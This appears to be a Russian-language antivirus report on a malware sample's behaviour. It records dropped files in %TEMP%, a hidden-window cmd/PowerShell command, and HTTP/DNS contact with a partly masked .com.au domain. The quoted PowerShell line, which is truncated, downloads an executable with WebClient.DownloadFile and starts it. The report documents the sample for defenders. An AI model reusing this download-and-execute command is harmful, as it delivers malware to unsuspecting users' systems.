Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $yyexjjr9 как %temp%\mg_jrz5.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function luzjeplrn([String] $Yyexjjr9){(New-Object System.Net.WebClient).DownloadFile($Yyexjjr9,''%TEMP%\Mg_jrz5.exe'');Start-Process ''%TEMP%\Mg_jrz5.exe'';}try{lu...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\xcg1.bat
- %TEMP%\853512.cvr
Сетевая активность
Подключается к
- 'su#####apital.com.au':80
TCP
Запросы HTTP GET
- http://su#####apital.com.au/ser1812.png
UDP
- DNS ASK su#####apital.com.au
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function luzjeplrn([String] $Yyexjjr9){(New-Object System.Net.WebClient).DownloadFile($Yyexjjr9,''%TEMP%\Mg_jrz5.exe'');Start-Process ''%TEMP%\Mg_jrz5.exe'';}try{lu...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Xcg1.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Xcg1.bat" "
